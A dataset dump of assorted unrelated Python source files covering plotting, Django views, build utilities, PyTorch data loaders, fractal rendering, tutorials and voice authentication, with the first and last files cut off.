ax.scatter(A[:,0],A[:,1],A[:,2], c = 'y', marker = 'o')
ax.scatter(B[:,0],B[:,1],B[:,2], c = 'b', marker = '+')
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_zlabel('Z')
from mpl_toolkits.mplot3d import Axes3D
def displayABC(A,B,C):
fig = plt.figure()
dim = A.shape[1]
if dim==2:
ax = plt.subplot(121)
display2Dpointsets(A, B, ax)
ax = plt.subplot(122)
display2Dpointsets(C, B, ax)
if dim==3:
plot1 = plt.subplot(1,2,1)
ax = Axes3D(fig, rect = plot1.get_position())
display3Dpointsets(A,B,ax)
plot2 = plt.subplot(1,2,2)
ax = Axes3D(fig, rect = plot2.get_position())
display3Dpointsets(C,B,ax)
plt.show()
def display_pts(f_config):
config = ConfigObj(f_config)
file_section = config['FILES']
mf = file_section['model']
sf = file_section['scene']
tf = file_section['transformed_model']
m = np.loadtxt(mf)
s = np.loadtxt(sf)
t = np.loadtxt(tf)
displayABC(m,s,t)
|
984,620 | 1e431b3070502d500df59eeb2d81030c0a55785e | for i in range(100,1000):
a=i/100
b=(i%100)/10
c=(i%100)%10
if a**3+b**3+c**3==i:
print i
|
984,621 | 0b8bebd88417d46b03553d2a06f40201dd3c1293 |
from django.db import models
class NewsQueryset(models.QuerySet):
"""
"""
def news_for_week(self):
"""All news from website for week."""
raise NotImplementedError
def news_for_month(self):
"""All news from website for month."""
raise NotImplementedError
def news_about_snippets(self):
""" """
raise NotImplementedError
|
984,622 | 993ffda4ac667d4c4e76b87b70eea290b7b73879 | """misc build utility functions"""
# Copyright (c) PyZMQ Developers
# Distributed under the terms of the Modified BSD License.
import copy
import logging
import os
import sys
from pprint import pprint
from shlex import quote
from subprocess import PIPE, Popen
from .msg import warn
pjoin = os.path.join
def customize_mingw(cc):
# strip -mno-cygwin from mingw32 (Python Issue #12641)
for cmd in [
cc.compiler,
cc.compiler_cxx,
cc.compiler_so,
cc.linker_exe,
cc.linker_so,
]:
if '-mno-cygwin' in cmd:
cmd.remove('-mno-cygwin')
# remove problematic msvcr90
if 'msvcr90' in cc.dll_libraries:
cc.dll_libraries.remove('msvcr90')
def get_compiler(compiler, **compiler_attrs):
"""get and customize a compiler"""
cc = copy.deepcopy(compiler)
for name, val in compiler_attrs.items():
setattr(cc, name, val)
return cc
def get_output_error(cmd, **kwargs):
"""Return the exit status, stdout, stderr of a command"""
if not isinstance(cmd, list):
cmd = [cmd]
logging.debug("Running: %s", ' '.join(map(quote, cmd)))
try:
result = Popen(cmd, stdout=PIPE, stderr=PIPE, **kwargs)
except OSError as e:
return -1, '', f'Failed to run {cmd!r}: {e!r}'
so, se = result.communicate()
# unicode:
so = so.decode('utf8', 'replace')
se = se.decode('utf8', 'replace')
return result.returncode, so, se
def locate_vcredist_dir(plat):
"""Locate vcredist directory and add it to $PATH
Adding it to $PATH is required to run
executables that link libzmq to find e.g. msvcp140.dll
"""
from setuptools import msvc
vcvars = msvc.msvc14_get_vc_env(plat)
try:
vcruntime = vcvars["py_vcruntime_redist"]
except KeyError:
warn(f"platform={plat}, vcvars=")
pprint(vcvars, stream=sys.stderr)
warn(
"Failed to get py_vcruntime_redist via vcvars, may need to set it in %PATH%"
)
return None
redist_dir, dll = os.path.split(vcruntime)
# add redist dir to $PATH so that it can be found
os.environ["PATH"] += os.pathsep + redist_dir
return redist_dir
|
984,623 | 562205f6e653a044a030b192ee6d92e74cd37a88 | from torch.utils import data
from torchvision import transforms as T
from torchvision.datasets import ImageFolder
from PIL import Image
import torch
import os
import random
import pdb
class ImageFolder(data.Dataset):
"""Dataset class for the CelebA dataset."""
def __init__(self, image_dir, transform,mode):
"""Initialize and preprocess the CelebA dataset."""
self.image_dir = image_dir
self.train_images = list(map(lambda x: os.path.join(image_dir+mode, x), os.listdir(image_dir+mode)))
self.transform = transform
self.num_images = len(self.train_images)
self.mode=mode
def __getitem__(self, index):
"""Return one image and its corresponding attribute label."""
#random.seed()
#random.shuffle(self.train_images)
src = self.train_images[index]
print(index)
src_char = int(src.split('_')[0][len(self.image_dir+self.mode+'/'):])
src_style = int(src.split('_')[1][:-len(".jpg")])
#pdb.set_trace()
try:
trg = random.choice([x for x in self.train_images
if '_'+str(src_style) in x and str(src_char)+'_' not in x])
#print(1)
except:
trg = src
#print(2)
trg_style = int(trg.split('_')[1][:-len(".jpg")])
trg_char = int(trg.split('_')[0][len(self.image_dir+self.mode+'/'):])
src = self.transform(Image.open(src))
trg = self.transform(Image.open(trg))
return src, src_style, src_char, \
trg, trg_style, trg_char
def __len__(self):
"""Return the number of images."""
return self.num_images
class ImageFolder1(data.Dataset):
"""Dataset class for the CelebA dataset."""
def __init__(self, image_dir, transform,mode):
"""Initialize and preprocess the CelebA dataset."""
self.image_dir = image_dir
self.train_imagefs = list(map(lambda x: os.path.join(image_dir+mode, x), os.listdir(image_dir+mode)))
self.transform = transform
self.num_images = len(self.train_imagefs)
self.mode=mode
def __getitem__(self, index):
"""Return one image and its corresponding attribute label."""
if self.mode=='train':
random.seed()
random.shuffle(self.train_imagefs)
#print(index)
fo = self.train_imagefs[index]
imgs=os.listdir(fo)
x=[]
for item in imgs:
x.append(self.transform(Image.open(fo+'/'+item)))
x=torch.cat(x, dim=0)
return x
def __len__(self):
"""Return the number of images."""
return self.num_images
def get_loader(m,image_dir, attr_path, selected_attrs, crop_size=178, image_size=128,
batch_size=16, dataset='CelebA', mode='train', num_workers=1):
"""Build and return a data loader."""
transform = []
transform.append(T.ToTensor())
#transform.append(T.Normalize(mean=[0.5], std=[0.5]))
transform = T.Compose(transform)
if dataset == 'CelebA':
dataset = CelebA(image_dir, attr_path, selected_attrs, transform, mode)
elif dataset == 'RaFD':
if m==10:
dataset = ImageFolder1(image_dir, transform,mode)
else:
dataset = ImageFolder(image_dir, transform,mode)
data_loader = data.DataLoader(dataset=dataset,
batch_size=batch_size,
shuffle=(mode=='train'),
num_workers=num_workers)
return data_loader |
984,624 | b7ea4032aeb959124d3b9b7c724e5046a930d806 | from django.db import models
from tenant_schemas.models import TenantMixin
class Tenant(TenantMixin):
name = models.CharField(max_length=100)
auto_create_schema = True
# class Domain(DomainMixin):
# pass
|
984,625 | ddddc929e7993fb8f87d581cef2961f322b39cb5 | from .csmnet import CSMNet
__all__ = [
"CSMNet"
] |
984,626 | 32e4a2e74beead088e26dd373f42a30e68107645 | # @abrightmoore
# from numpy import *
from math import sqrt, tan, sin, cos, pi, ceil, floor, acos, atan, asin, degrees, radians, log, atan2
import os
import time
from random import randint, random, Random
import io
from io import BytesIO
import sys
from numpy import *
from PIL import Image, ImageDraw
from ImageTools import *
from Gen_Trigonometry import calcFormula
from Colours import *
def draw(img):
chance = random()
if chance < 0.3:
popcorn1(img)
elif chance < 1.0:
popcorn2(img)
else:
popcorn3(img) # With colour - under test
def popcorn3(img): # http://paulbourke.net/fractals/popcorn/popcorn.c
width = img.size[0]
height = img.size[1]
img2 = Image.new("RGBA",size=(width,height),color=(0,0,0))
scale = 1000 #random() * 20+0.01
hconst = 0.5 #0.01 * randint(1,5)
#scale = width
N = 1000
M = 0.1 #randint(5,20)
C = getColoursBrownian(randint(32,128),randint(4,16))
# C = getRandomAnalogousColours()
print C
pix = img2.load()
i = 0
while i < width:
j = 0
while j < height:
x = float(2.0 * scale * (float(i) - float(width) / 2.0) / float(width))
y = float(2.0 * scale * (float(j) - float(height) / 2.0) / float(height))
for n in xrange(0,N):
xnew = float(x - hconst * sin(y + tan(3 * y)))
ynew = float(y - hconst * sin(x + tan(3 * x)))
ix = 0.5 * xnew * float(width) / scale + float(width) / 2.0;
iy = 0.5 * ynew * float(height) / scale + float(height) / 2.0;
if (ix >= 0 and iy >= 0 and ix < width and iy < height):
(vr,vg,vb) = pix[ix,iy]
colour = ((vr+1)%255,(vg+1)%255,(vb+1)%255,255)
pix[ix,iy] = colour
x = xnew
y = ynew
j = j+M
i = i +M
px = img.load()
max = 0
min = 255
for x in xrange(0,width):
for y in xrange(0,height):
(vr,vg,vb) = pix[x,y]
(r,g,b) = C[vr%len(C)]
px[x,y] = (r,g,b,255)
if vr > max:
max = vr
if vr < min:
min = vr
print min,max
img2.save("imagesTest\\testonly_"+str(randint(1000000,9999999))+".png")
def popcorn2(img): # http://paulbourke.net/fractals/popcorn/popcorn.c
width = img.size[0]
height = img.size[1]
scale = random() * 20
hconst = 0.001 * randint(1,60)
#scale = width
N = randint(400,1000)
M = randint(5,20)
pix = img.load()
i = 0
while i < width:
j = 0
while j < height:
x = float(2.0 * scale * (i - width / 2) / width)
y = float(2.0 * scale * (j - height / 2) / height)
for n in xrange(0,N):
xnew = float(x - hconst * sin(y + tan(3 * y)))
ynew = float(y - hconst * sin(x + tan(3 * x)))
ix = 0.5 * xnew * width / scale + width / 2;
iy = 0.5 * ynew * height / scale + height / 2;
if (ix >= 0 and iy >= 0 and ix < width and iy < height):
(vr,vg,vb,va) = pix[ix,iy]
colour = ((vr+16)%255,(vg+16)%255,(vb+16)%255,va)
pix[ix,iy] = colour
x = xnew
y = ynew
j = j+M
i = i +M
def popcorn1(img): # http://paulbourke.net/fractals/popcorn/popcorn.c
width = img.size[0]
height = img.size[1]
scale = random() * 20
hconst = 0.001 * randint(1,60)
#scale = width
N = randint(400,1000)
M = randint(5,20)
pix = img.load()
i = 0
while i < width:
j = 0
while j < height:
x = float(2.0 * scale * (i - width / 2) / width)
y = float(2.0 * scale * (j - height / 2) / height)
for n in xrange(0,N):
xnew = float(x - hconst * sin(y + tan(3 * y)))
ynew = float(y - hconst * sin(x + tan(3 * x)))
colour = (n/N*255,n/N*255,n/N*255,255)
ix = 0.5 * xnew * width / scale + width / 2;
iy = 0.5 * ynew * height / scale + height / 2;
if (ix >= 0 and iy >= 0 and ix < width and iy < height):
pix[ix,iy] = colour
x = xnew
y = ynew
j = j+M
i = i +M
def popcornH(img,hconst): # http://paulbourke.net/fractals/popcorn/popcorn.c
width = img.size[0]
height = img.size[1]
scale = 10 #random() * 20
# hconst = 0.001 * randint(1,60)
#scale = width
N = 1000 #randint(400,1000)
M = 0.1 #randint(5,20)
max = 0
pix = img.load()
i = float(0)
while i < width:
j = float(0)
while j < height:
x = float(2.0 * scale * (i - width / 2) / width)
y = float(2.0 * scale * (j - height / 2) / height)
for n in xrange(0,N):
xnew = float(x - hconst * sin(y + tan(3 * y)))
ynew = float(y - hconst * sin(x + tan(3 * x)))
colour = (n/N*255,n/N*255,n/N*255,255)
ix = 0.5 * xnew * width / scale + width / 2;
iy = 0.5 * ynew * height / scale + height / 2;
if (ix >= 0 and iy >= 0 and ix < width and iy < height):
(r,g,b,a) = pix[ix,iy]
v = (r<<16)+(g<<8)+b
v = v+1
if v == 0:
v = 128
if v > max:
max = v
pix[ix,iy] = ((v&0xff0000)>>16,(v&0xff00)>>8,(v&0xff),255)
# print pix[ix,iy]
x = xnew
y = ynew
j = M+j
i = M+i
def stubby():
# Re-render image in colours
print "Painting pixels..."
coloursArray = [[(0.0,0,7,100),(0.16,32,107,203),(0.42,237,255,255),(0.6425,255,170,0),(0.8575,0,2,0),(1.0,30,0,0)], # after NightElfik
[(0.0,0,randint(10,100),randint(10,100)),(0.16,randint(10,100),randint(10,107),randint(10,203)),(0.42,randint(10,235),randint(10,255),randint(10,255)),(0.6425,randint(10,255),randint(10,170),0),(0.8575,0,2,0),(1.0,30,0,0)],
[(0.0,0,randint(128,255),randint(128,255)),(0.16,randint(128,255),randint(128,255),randint(128,256)),(0.42,randint(128,255),randint(128,255),randint(128,255)),(0.6425,randint(128,255),randint(128,255),0),(0.8575,0,2,0),(1.0,30,0,0)],
]
colours = coloursArray[0] #randint(0,len(coloursArray)-1)]
print "Max "+str(max)
for x in xrange(0,width):
for y in xrange(0,height):
(r,g,b,a) = pix[x,y]
count = (r<<16)+(g<<8)+b
#remap to colour
posn = float(count)/float(max)
(p1, r1, g1, b1) = colours[0]
for (p2, r2, g2, b2) in colours:
if p1 <= posn and posn < p2:
posnDelta = posn - p1
gap = p2 - p1
colPos = posnDelta/gap
pix[x,y] = (int(r1+colPos*(r2-r1))%256,
int(g1+colPos*(g2-g1))%256,
int(b1+colPos*(b2-b1))%256,255)
exit
(p1, r1, g1, b1) = (p2, r2, g2, b2) |
984,627 | b05b5b47e218579a8ae7a7484c5eef24c89bc3a3 | #!/usr/bin/env python3
import sys
numbers = sorted([int(x) for x in sys.stdin.readline().split(' ')])
d = {}
for k, v in zip('ABC', numbers):
d[k] = v
print(' '.join(['{}'.format(d[k]) for k in sys.stdin.readline().rstrip()]))
|
984,628 | e0df592a5d07c3a574990368c83349ea83534d30 | import json, urllib.request
from socket import error as SocketError
import errno
import datetime
# Retirve Json Data from Within API
mylist = []
today = datetime.date.today()
mylist.append(today)
currentDate = mylist[0]
url = "http://empisapi.accline.com/api/attendance/getattendancesbydate?date={}&deptId=0&desigId=0".format(currentDate)
try:
response = urllib.request.urlopen(url)
json_data = json.loads(response.read())
result = json_data.get("Result")
except SocketError as e:
if e.errno != errno.ECONNRESET:
raise # Not error we are looking for
print("Internet Not Connected") ## Handle error here.
fields = [
# 'PID',
'pid',
'pname',
'desig',
'dept',
'lts_i',
'lts_O',
# 'P_Status'
'p_status'
]
my_data = [list(item[field] for field in fields) for item in result]
|
984,629 | 5e66dbd36ae6e73c64012ac09d964db2e822afbd |
A = [[1,2,3],
[4,5,6],
[7,8,9]]
B = [[5,8,1,2],
[1,2,6,8],
[4,5,9,1]]
result = [[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]]
for i in range(len(A)):
for j in range(len(B[0])):
for k in range(len(B)):
result[i][j] += A[i][k] * B[k][j]
for r in result:
print(r)
|
984,630 | 082d4ae47d23d812f69f9640bc0747ce49770724 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (C) 2012 Yahoo! Inc. All Rights Reserved.
# Copyright (C) 2012 New Dream Network, LLC (DreamHost) All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Platform-specific logic for Ubunutu Oneiric components.
"""
import tempfile
import time
from devstack.components import db
from devstack import log as logging
from devstack import shell as sh
from devstack import utils
from devstack.packaging import apt
LOG = logging.getLogger(__name__)
class DBInstaller(db.DBInstaller):
def _configure_db_confs(self):
LOG.info("Fixing up %s mysql configs.", self.distro.name)
fc = sh.load_file('/etc/mysql/my.cnf')
lines = fc.splitlines()
new_lines = list()
for line in lines:
if line.startswith('bind-address'):
line = 'bind-address = %s' % ('0.0.0.0')
new_lines.append(line)
fc = utils.joinlinesep(*new_lines)
with sh.Rooted(True):
sh.write_file('/etc/mysql/my.cnf', fc)
class AptPackager(apt.AptPackager):
def _remove_special(self, name, info):
if name == 'rabbitmq-server':
#https://bugs.launchpad.net/ubuntu/+source/rabbitmq-server/+bug/878597
#https://bugs.launchpad.net/ubuntu/+source/rabbitmq-server/+bug/878600
LOG.debug("Handling special remove of %s." % (name))
pkg_full = self._format_pkg_name(name, info.get("version"))
cmd = apt.APT_REMOVE + [pkg_full]
self._execute_apt(cmd)
#probably useful to do this
time.sleep(1)
#purge
cmd = apt.APT_PURGE + [pkg_full]
self._execute_apt(cmd)
return True
return False
def _install_special(self, name, info):
if name == 'rabbitmq-server':
#https://bugs.launchpad.net/ubuntu/+source/rabbitmq-server/+bug/878597
#https://bugs.launchpad.net/ubuntu/+source/rabbitmq-server/+bug/878600
LOG.debug("Handling special install of %s." % (name))
#this seems to be a temporary fix for that bug
with tempfile.TemporaryFile() as f:
pkg_full = self._format_pkg_name(name, info.get("version"))
cmd = apt.APT_INSTALL + [pkg_full]
self._execute_apt(cmd, stdout_fh=f, stderr_fh=f)
return True
return False
|
984,631 | c5f5668883747e3bda4da0f7d2608dd1862e9fd4 | from .models import *
from .forms import StopCreateForm
from django.shortcuts import render, redirect
from django.http import HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.contrib import messages
def stop(request, slug):
s = Stop.objects.filter(slug=slug).first()
sf = StopForum.objects.filter(stop=s).first()
joined = request.user in s.attendees.all()
caravan_member = request.user in s.caravan.members.all()
print(caravan_member)
is_interested = Vote.objects.filter(user=request.user, forum=sf, infavor=True).count() > 0
context={"s":s, "sf":sf, "joined":joined, 'caravan_member':caravan_member, 'is_interested':is_interested}
return render(request, 'feed/stop.html', context)
@login_required
def my_stops(request):
# for s in Stop.objects.all():
# s.update_slug()
my_stops = Stop.objects.filter(attendees=request.user).order_by('start_date')
stops_by_caravan = {}
my_caravans = set([s.caravan for s in my_stops])
#my_caravans = request.user.caravan_set.all()
for c in my_caravans:
stops_by_caravan[c] = [my_stops.filter(caravan=c)]
print(stops_by_caravan)
context = {'my_stops':my_stops, 'stops_by_caravan':stops_by_caravan}
return render(request, 'feed/my_stops.html', context)
@login_required
def join_stop(request, slug):
s = Stop.objects.filter(slug=slug).first()
if request.user in s.caravan.members.all():
s.attendees.add(request.user)
print("Stop joined")
else:
print("ERROR: You must join this caravan first")
return HttpResponseRedirect(f'/feed/stop/{s.slug}')
@login_required
def leave_stop(request, slug):
s = Stop.objects.filter(slug=slug).first()
s.attendees.remove(request.user)
print("Stop removed")
return HttpResponseRedirect(f'/feed/stop/{s.slug}')
@login_required
def add_stop(request, c_name=None):
context = {}
if request.method == 'POST':
s_form = StopCreateForm(request.POST)
if s_form.is_valid():
# status should be set to proposed and then auto-updated
# need to create forum
s = s_form.save()
messages.success(request, f'Your Stop has been created.')
sf = StopForum.from_stop(s)
sf.save()
return redirect('caravan', c_name)
else:
# if c_name == None:
# sc_form = StopCaravanForm(instance=request.user)
# context = {'sc_form':sc_form}
# render(request, 'feed/add_stop_caravan.html', context)
# elif len(Caravan.objects.filter(name=c_name).all()) == 1:
# s_form = StopCreateForm(instance=request.user)
# context = {'s_form':s_form, 'c_name': c_name}
# return render(request, 'feed/add_stop.html', context)
# else:
# print('caravan_name not valid')
# pass
s_form = StopCreateForm(instance=request.user)
context = {'s_form':s_form, 'c_name': c_name}
return render(request, 'feed/add_stop.html', context)
#context={}
#return render(request, 'feed/add_stop.html', context)
# @login_required
# def edit_stop(request):
# #must be a leader if decided, or the creator or a leader if tentative or proposal
# context={}
# return render(request, 'feed/edit_stop.html', context)
@login_required
def stop_vote_yes(request, slug):
s = Stop.objects.get(slug=slug)
u = request.user
sf = StopForum.objects.get(stop=s)
v = Vote.create_yes(u,sf)
v.save()
return HttpResponseRedirect(f'/feed/stop/{s.slug}')
@login_required
def stop_remove_vote(request, slug):
s = Stop.objects.get(slug=slug)
u = request.user
sf = StopForum.objects.get(stop=s)
v = Vote.objects.filter(user=u, forum=sf).all()
v.delete()
return HttpResponseRedirect(f'/feed/stop/{s.slug}') |
984,632 | 2bb80eca9e1ea7dc5742973b822d68e6ae88ff31 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import math
# 空函数
def nop():
pass
def my_abs(x):
if not isinstance(x, (int, float)):
raise TypeError('bad operand type')
if x >= 0:
return x
else:
return -x
def move(x, y, step, angle=0):
nx = x + step * math.cos(angle)
ny = y - step * math.sin(angle)
return nx, ny
n = my_abs(-20)
print(n)
x, y = move(100, 100, 60, math.pi / 6)
print(x, y)
# TypeError: bad operand type:
# my_abs('123')
print()
# 位置参数(普通参数)
# 默认参数
def power(x, n=2):
s = 1
while n > 0:
n = n - 1
s = s * x
return s
print(power(5))
print(power(5, 2))
print()
# 默认参数不要指向不变对象
def add_end(L=[]):
L.append('END')
return L
# 将上面的函数修改一下
def add_end2(L=None):
if L is None:
L = []
L.append('END')
return L
print(add_end())
print(add_end())
print()
print(add_end2())
print(add_end2())
print()
# 可变参数,参数前面加了一个*号
# 可变参数在函数调用时自动组装为一个tuple
def calc(*numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
print(calc())
print(calc(1, 2))
print(calc(*[1, 2, 3]))
print()
# 关键字参数
# 关键字参数允许传入0个或任意个含参数名的参数,这些关键字参数在函数内部自动组装为一个dict
def person(name, age, **kw):
if 'city' in kw:
# 有city参数
pass
if 'job' in kw:
# 有job参数
pass
print('name:', name, 'age:', age, 'other:', kw)
person('Michael', 30)
person('Bob', 35, city='Beijing')
person('Adam', 45, gender='M', job='Engineer')
extra = {'city': 'Beijing', 'job': 'Engineer'}
person('Jack', 24, city=extra['city'], job=extra['job'])
person('Jack', 24, **extra)
print()
# 命名关键字参数
# 如果要限制关键字参数的名字,就可以用命名关键字参数
# 命名关键字参数需要一个特殊分隔符*,*后面的参数被视为命名关键字参数
def person(name, age, *, city, job):
print(name, age, city, job)
person('Jack', 24, city='Beijing', job='Engineer')
# 如果函数定义中已经有了一个可变参数,后面跟着的命名关键字参数就不再需要一个特殊分隔符*了
def person(name, age, *args, city='Beijing', job):
print(name, age, args, city, job)
person('Jack', 24, *[1, 2, 3], job='Engineer')
print()
# 参数组合
# 参数定义的顺序必须是:必选参数、默认参数、可变参数、命名关键字参数和关键字参数
def f1(a, b, c=0, *args, **kw):
print('a =', a, 'b =', b, 'c =', c, 'args =', args, 'kw =', kw)
def f2(a, b, c=0, *, d, **kw):
print('a =', a, 'b =', b, 'c =', c, 'd =', d, 'kw =', kw)
f1(1, 2)
f1(1, 2, c=3)
f1(1, 2, 3, 'a', 'b')
f1(1, 2, 3, 'a', 'b', x=99)
f2(1, 2, d=99, ext=None)
print()
# 对于任意函数,都可以通过类似func(*args, **kw)的形式调用它,无论它的参数是如何定义的
f1(*(1, 2, 3, 4), **{'d': 99, 'x': '#'})
f2(*(1, 2, 3), **{'d': 88, 'x': '#'})
|
984,633 | a3193bce83ccc5722163ffad89c8da58a481d511 | '''
Created on 16-Oct-2018
@author: Vishnu
'''
from VoiceAuthentication.Features import mfcc
from sklearn.externals import joblib
import os
from sklearn.neighbors import LSHForest
from sklearn.metrics import pairwise_distances_argmin_min
path = os.getcwd() + '/VoiceAuthentication/VoiceAuthentication'
def predict(login, file):
login_features = mfcc(login, file)
lshf = LSHForest(random_state=42)
gmm = joblib.load(path + '/speaker_models/' + login + '.pkl')
ubm = joblib.load(path + '/speaker_models/' + 'ubm.pkl')
model = joblib.load(path + '/speaker_models/' + login + 'Model.pkl')
gmm_likelihood_score = gmm.score(login_features)
ubm_likelihood_score = ubm.score(login_features)
likelihood_score = gmm_likelihood_score - ubm_likelihood_score
login_features = [j for i in login_features for j in i]
if len(model) > len(login_features):
array = model[:len(login_features)]
lshf.fit([array])
distances, indices = lshf.kneighbors([login_features], n_neighbors=2)
dist = pairwise_distances_argmin_min([array], [login_features])
else:
array = login_features[:len(model)]
lshf.fit([array])
distances, indices = lshf.kneighbors([model], n_neighbors=2)
dist = pairwise_distances_argmin_min([array], [model])
result = {}
result['score'] = [likelihood_score, distances]
result['distance'] = dist
if likelihood_score > 0:
result['Message'] = 'Authenticated'
else:
result['Message'] = 'Not Authenticated'
return result
|
984,634 | ac545b03a52e233a3c0168eee7625b94ca08d3ee | """
Helper functions for displaying data and making interactive plots.
"""
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.gridspec import GridSpec
import ipywidgets as widgets
from IPython.display import display, clear_output
import cmocean
import cartopy.crs as ccrs
from cartopy.mpl.ticker import LongitudeFormatter, LatitudeFormatter
def minmax(data, fields):
"""
Get the minimum and maximum data values out of all fields given.
Returns them in a dictionary with the 'vmin' and 'vmax' keys.
"""
vmin = min(data[field].min() for field in fields)
vmax = max(data[field].max() for field in fields)
return dict(vmin=vmin, vmax=vmax)
def plot_field(ax, data, field, cmap=None, gridline_spacing=3, cb_pad=0.03,
cb_aspect=50, cb_shrink=0.8, ticks=True, title=True, **kwargs):
"""
Make a pcolormesh plot of the given data field.
Set's the plot extent and includes ticks in longitude and latitude.
"""
if title:
ax.set_title(field)
if 'add_colorbar' not in kwargs:
kwargs['cbar_kwargs'] = dict(orientation='horizontal',
aspect=cb_aspect, pad=cb_pad,
shrink=cb_shrink)
data[field].plot.pcolormesh(ax=ax, add_labels=False, cmap=cmap, **kwargs)
ax.coastlines()
w, e, s, n = [data.longitude.values.min(), data.longitude.values.max(),
data.latitude.values.min(), data.latitude.values.max()]
ax.set_extent([w, e, s, n])
xlocs = np.arange(w, e + 0.01, gridline_spacing)
ylocs = np.arange(s, n + 0.01, gridline_spacing)
if ticks:
ax.set_xticks(xlocs)
ax.set_yticks(ylocs)
ax.xaxis.set_major_formatter(LongitudeFormatter())
ax.yaxis.set_major_formatter(LatitudeFormatter())
ax.gridlines(color="#cccccc55", xlocs=xlocs, ylocs=ylocs)
def plot_hawaii_data(data, field, **kwargs):
"""
Plot a given field from our Hawai'i dataset.
"""
fig = plt.figure(figsize=(12, 13))
ax = plt.axes(projection=ccrs.PlateCarree())
plot_field(ax, data, field, **kwargs)
plt.tight_layout(pad=0)
def plot_japan_data(data, field, **kwargs):
"""
Plot a given field from our Japan dataset.
"""
fig = plt.figure(figsize=(12, 13))
ax = plt.axes(projection=ccrs.PlateCarree())
plot_field(ax, data, field, gridline_spacing=5, **kwargs)
plt.tight_layout(pad=0)
def plot_himalayas_data(data, field, **kwargs):
"""
Plot a given field from our Himalayas dataset.
"""
fig = plt.figure(figsize=(12, 13))
ax = plt.axes(projection=ccrs.PlateCarree())
plot_field(ax, data, field, gridline_spacing=5, **kwargs)
plt.tight_layout(pad=0)
class ProfileSelector(object):
"""
Define a widget for selecting and plotting profiles from a dataset.
Use the ``interact`` method to insert an interactive widget to control
the profile location.
Use the ``plot`` method to plot a static profile figure.
Parameters
----------
data : xarray.Dataset
The data grid.
fields : list of str
The fields to plot in the upper profile
figsize : tuple
The size of the profile figure
projection : cartopy CRS
A cartopy projection to apply to the data maps
"""
def __init__(self, data, fields, projection, figsize=(15, 9),
profile_interval=10, dimension='latitude'):
self.data = data
self.fields = fields
self._plot_initiated = False
self.projection = projection
self.figsize = figsize
self.profile_interval = profile_interval
self.default_dimension = dimension
def plot(self, location, dimension):
"""
Plot a figure of the profile at location along dimension.
"""
if not self._plot_initiated:
# Setup the figure and subplot grid
self.fig = plt.figure(figsize=self.figsize)
grid = GridSpec(2, 4, hspace=0, wspace=0)
self.ax_data = self.fig.add_subplot(grid[0,:-1])
self.ax_topo = self.fig.add_subplot(grid[1,:-1])
self.ax_data_map = self.fig.add_subplot(grid[0,-1],
projection=self.projection)
self.ax_topo_map = self.fig.add_subplot(grid[1,-1],
projection=self.projection)
# The y axis limits for the profiles
self._topo_base = -10000
ylim_topo = [self._topo_base, self.data.topography_ell.max()*1.1]
ylim_data = list(sorted(minmax(self.data, self.fields).values()))
# Set labels and dimensions
self.ax_data.set_ylim(ylim_data)
self.ax_data.set_ylabel('mGal')
self.ax_topo.set_ylim(ylim_topo)
self.ax_topo.set_ylabel('Tropography (m)')
self.ax_data.grid(True)
self.ax_data.set_xticklabels([])
# Draw the profile lines
self._data_lines = {}
for field in self.fields:
self._data_lines[field], = self.ax_data.plot([0], [0], '-',
label=field)
self.ax_data.legend(loc='upper right')
# Place holders for the topography polygons
self._water_fill = None
self._topo_fill = None
# Plot the maps
plot_field(self.ax_data_map, self.data, self.fields[0],
ticks=False, add_colorbar=False, title=False,
cmap='RdBu_r')
plot_field(self.ax_topo_map, self.data, 'topography_ell',
ticks=False, add_colorbar=False, title=False,
cmap=cmocean.cm.delta)
# Draw on the maps showing the profiles
self._datamap_profile, = self.ax_data_map.plot([0, 0], [0, 0],
'--k')
self._topomap_profile, = self.ax_topo_map.plot([0, 0], [0, 0],
'--k')
plt.tight_layout(pad=0, h_pad=0, w_pad=0)
self._plot_initiated = True
# Get the name of the other dimension
dim_comp = set(self.data.dims).difference({dimension}).pop()
# Get the profile
x = self.data[dimension]
xlim = [x.min(), x.max()]
profile = self.data.loc[{dim_comp: location}]
# Update the data plots
for field in self.fields:
self._data_lines[field].set_data(x, profile[field])
# Update the topography plot
if self._topo_fill is not None:
self._topo_fill.remove()
if self._water_fill is not None:
self._water_fill.remove()
self._water_fill = self.ax_topo.fill_between(xlim, [0, 0],
self._topo_base,
color='#2780E3')
self._topo_fill = self.ax_topo.fill_between(x, profile.topography_ell,
self._topo_base,
color='#333333')
# Update the profile location plot
profile_location = [xlim, [location, location]]
if dimension.lower() == 'latitude':
profile_location = profile_location[::-1]
self._datamap_profile.set_data(*profile_location)
self._topomap_profile.set_data(*profile_location)
# Make sure the plots are tight
self.ax_data.set_xlim(xlim)
self.ax_topo.set_xlim(xlim)
self.ax_topo.set_xlabel(dimension.capitalize())
plt.show()
def interact(self):
"""
Display an interactive widget for choosing the profile.
"""
# Setup the initial value options for the location
dim = self.default_dimension
dim2 = set(self.data.dims).difference({dim}).pop()
options = self.data[dim2].values.tolist()[::self.profile_interval]
mid = options[len(options)//2]
# Make the slider for choosing the location
slider_label = widgets.Label("at {} value".format(dim2))
slider = widgets.SelectionSlider(options=options, value=mid,
layout=widgets.Layout(width="350px"))
# Make a menu for choosing the profile direction
dimension_chooser = widgets.Dropdown(
options=self.data.dims.keys(), value=dim,
description="Profile along")
def displayer(location, dimension):
"Update and display the plot with given arguments"
self.plot(location, dimension)
display(self.fig)
def handle_dimension_change(change):
"Change the location options when dimension changes"
dim2 = set(self.data.dims).difference({change.new}).pop()
slider_label.value = "at {} value".format(dim2)
options = self.data[dim2].values.tolist()[::self.profile_interval]
slider.options = options
slider.value = options[len(options)//2]
# Connect the dimension change to the slider
dimension_chooser.observe(handle_dimension_change, names='value')
# Make the output display and connect it to the callback
output = widgets.interactive_output(
displayer, {'location': slider, 'dimension': dimension_chooser})
# Make a title for the widget
title = widgets.HTML(
